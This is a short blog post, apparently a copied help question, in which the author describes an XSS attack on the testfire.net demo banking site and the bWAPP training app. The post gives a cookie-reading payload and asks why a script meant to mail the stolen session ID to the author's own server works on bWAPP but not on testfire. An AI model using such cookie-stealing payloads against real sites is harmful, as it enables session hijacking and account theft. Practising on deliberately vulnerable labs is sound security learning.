samedi 17 janvier 2015

Can't mail stolen session ID



I'm working on this platform: http://testfire.net/


With this script I can see the cookie: ">alert(document.cookie)


So now I'm trying to mail this cookie to me. ">


When I go to webserver/cookie and I refresh, than I receive an empty e-mail. So that works. It also worked on other platforms!!! For example on BWAPP I received the Session ID in the mail. But I did not succeed in it on testfire.


So my big problem is that my Javascript can't force to send an e-mail to me from testfire.net





Aucun commentaire:

Enregistrer un commentaire